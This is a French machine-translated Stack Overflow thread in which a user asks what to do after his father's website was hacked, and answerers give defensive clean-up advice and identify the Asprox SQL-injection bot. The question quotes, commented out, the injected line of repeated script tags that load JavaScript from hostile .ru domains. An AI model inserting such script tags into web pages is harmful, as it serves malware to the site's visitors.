Mon site internet a été piraté..Que dois-je faire?[fermé]
https://stackoverflow.com/questions/2970
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianQuestion
Mon père m'a appelé aujourd'hui et m'a dit que les personnes visitant son site Web recevaient 168 virus essayant de les télécharger sur leur ordinateur.Il n'est pas du tout technique et a tout construit avec un éditeur WYSIWYG.
J'ai ouvert son site et consulté la source, et il y avait une ligne d'inclusions Javascript au bas de la source juste avant la balise HTML de fermeture.Ils ont inclus ce fichier (parmi tant d'autres) : http://www.98hs.ru/js.js <-- DÉSACTIVEZ JAVASCRIPT AVANT D'ACCÉDER À CETTE URL.
Je l'ai donc commenté pour l'instant.Il s'avère que son mot de passe FTP était un simple mot du dictionnaire composé de six lettres, nous pensons donc que c'est ainsi qu'il a été piraté.Nous avons changé son mot de passe en une chaîne non-mot de plus de 8 chiffres (il n'opterait pas pour une phrase secrète puisqu'il est un dactylographe hunt-n-peck).
j'ai fait un qui est sur 98hs.ru et j'ai découvert qu'il était hébergé sur un serveur au Chili.Il y a en fait une adresse e-mail qui y est également associée, mais je doute sérieusement que cette personne soit le coupable.Probablement juste un autre site qui a été piraté...
Je ne sais pas quoi faire à ce stade, car je n'ai jamais eu affaire à ce genre de chose auparavant.Quelqu'un a des suggestions ?
Il utilisait FTP non sécurisé Plain Jane via webhost4life.com.Je ne vois même pas un moyen de faire sftp sur leur site.Je pense que son nom d'utilisateur et son mot de passe ont été interceptés ?
Alors, pour rendre cela plus pertinent pour la communauté, quelles sont les étapes à suivre/les meilleures pratiques à suivre pour protéger votre site Web contre le piratage ?
Pour mémoire, voici la ligne de code qui a été ajoutée "par magie" à son fichier (et qui ne figure pas dans son fichier sur son ordinateur - je l'ai laissée en commentaire juste pour être absolument sûr qu'elle ne fera rien. sur cette page, même si je suis sûr que Jeff se garderait de cela) :
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
La solution
Essayez de rassembler autant d’informations que possible.Vérifiez si l'hébergeur peut vous fournir un journal montrant toutes les connexions FTP effectuées sur votre compte.Vous pouvez les utiliser pour voir si c'est même une connexion FTP qui a été utilisée pour effectuer la modification et éventuellement obtenir une adresse IP.
Si vous utilisez un logiciel préemballé comme Wordpress, Drupal ou tout autre logiciel que vous n'avez pas codé, il peut y avoir des vulnérabilités dans le code de téléchargement qui permettent ce type de modification.S'il est personnalisé, vérifiez tous les endroits où vous autorisez les utilisateurs à télécharger des fichiers ou à modifier des fichiers existants.
La deuxième chose serait de faire un dump du site tel quel et de tout vérifier pour d'autres modifications.Il se peut qu'il s'agisse d'une seule modification qu'ils ont apportée, mais s'ils sont entrés via FTP, qui sait ce qu'il y a d'autre là-haut.
Remettez votre site dans un bon état connu et, si nécessaire, effectuez une mise à niveau vers la dernière version.
Il y a un niveau de rendement que vous devez également prendre en compte.Les dégâts valent-ils la peine d'essayer de retrouver la personne ou s'agit-il simplement de quelque chose où vous vivez, apprenez et utilisez des mots de passe plus forts ?
Autres conseils
Je sais que c'est un peu tard dans le jeu, mais l'URL mentionnée pour le JavaScript est mentionnée dans une liste de sites connus pour avoir fait partie de la résurgence du bot ASPRox qui a démarré en juin (du moins c'est à ce moment-là que nous avons été signalés avec il).Quelques détails à ce sujet sont mentionnés ci-dessous :
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
Le problème, c'est qu'en réalité, chaque champ de type varchar de la base de données est "infecté" pour cracher une référence à cette URL, dans laquelle le navigateur obtient une petite iframe qui le transforme en robot.Un correctif SQL de base pour cela peut être trouvé ici :
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
Ce qui est effrayant, cependant, c'est que le virus recherche dans les tables système les valeurs à infecter et que de nombreux plans d'hébergement partagé partagent également l'espace de base de données pour leurs clients.Il est donc fort probable que ce ne soit même pas le site de votre père qui ait été infecté, mais le site de quelqu'un d'autre au sein de son cluster d'hébergement qui a écrit du code médiocre et ouvert la porte à une attaque par injection SQL.
S'il ne l'a pas encore fait, j'enverrais un e-mail URGENT à leur hôte et leur donnerais un lien vers ce code SQL pour réparer l'ensemble du système.Vous pouvez réparer vos propres tables de base de données affectées, mais il est fort probable que les robots responsables de l'infection passeront à nouveau par ce trou et infecteront l'ensemble.
J'espère que cela vous donnera plus d'informations sur lesquelles travailler.
MODIFIER:Une dernière réflexion rapide : s'il utilise l'un des outils de conception en ligne de l'hébergeur pour créer son site Web, tout ce contenu se trouve probablement dans une colonne et a été infecté de cette façon.
Vous mentionnez que votre père utilisait un outil de publication de sites Web.
Si l'outil de publication publie depuis son ordinateur vers le serveur, il se peut que ses fichiers locaux soient propres et qu'il lui suffise de republier sur le serveur.
Il devrait cependant voir s'il existe une méthode de connexion à son serveur différente du simple FTP...ce n'est pas très sécurisé car il envoie son mot de passe en texte clair sur Internet.
Avec un mot de passe de six caractères, il a peut-être été forcé brutalement.C'est plus probable que son FTP soit intercepté, mais cela pourrait aussi être le cas.
Commencez avec un mot de passe plus fort.(8 caractères, c'est quand même assez faible)
Vérifiez si ce lien vers un Internet blog sur la sécurité est utile.
Le site est-il simplement du HTML statique ?c'est à dire.il n'a pas réussi à coder lui-même une page de téléchargement permettant à toute personne passant par là de télécharger des scripts/pages compromis ?
Pourquoi ne pas demander à webhost4life s'ils disposent de journaux FTP et leur signaler le problème.On ne sait jamais, ils peuvent être assez réceptifs et découvrir pour vous exactement ce qui s'est passé ?
Je travaille pour un hébergeur partagé et nous apprécions toujours les rapports comme ceux-ci et pouvons généralement identifier le vecteur exact de l'attaque et indiquer où le client s'est trompé.
Débranchez le serveur Web sans l'arrêter pour éviter les scripts d'arrêt.Analysez le disque dur via un autre ordinateur en tant que lecteur de données et voyez si vous pouvez déterminer le coupable grâce aux fichiers journaux et à des éléments de cette nature.Vérifiez que le code est sûr, puis restaurez-le à partir d'une sauvegarde.
Cela est arrivé récemment à un de mes clients hébergé sur ipower.Je ne sais pas si votre environnement d'hébergement était basé sur Apache, mais si c'était le cas, assurez-vous de vérifier les fichiers .htaccess que vous n'avez pas créés, en particulier au-dessus de la racine Web et à l'intérieur des répertoires d'images, car ils ont tendance à y injecter de la méchanceté. également (ils redirigeaient les gens en fonction de leur provenance lors de la référence).Vérifiez également tout ce que vous avez créé pour le code que vous n'avez pas écrit.
Apparemment, nous avions été piratés par les mêmes gars !Ou des robots, dans notre cas.Ils utilisaient l'injection SQL dans les URL sur certains vieux sites ASP classiques que plus personne ne maintient.Nous avons trouvé des adresses IP attaquantes et les avons bloquées dans IIS.Nous devons maintenant refactoriser tous les anciens ASP.Donc, mon conseil est de jeter d'abord un œil aux journaux IIS, pour savoir si le problème vient du code de votre site ou de la configuration du serveur.
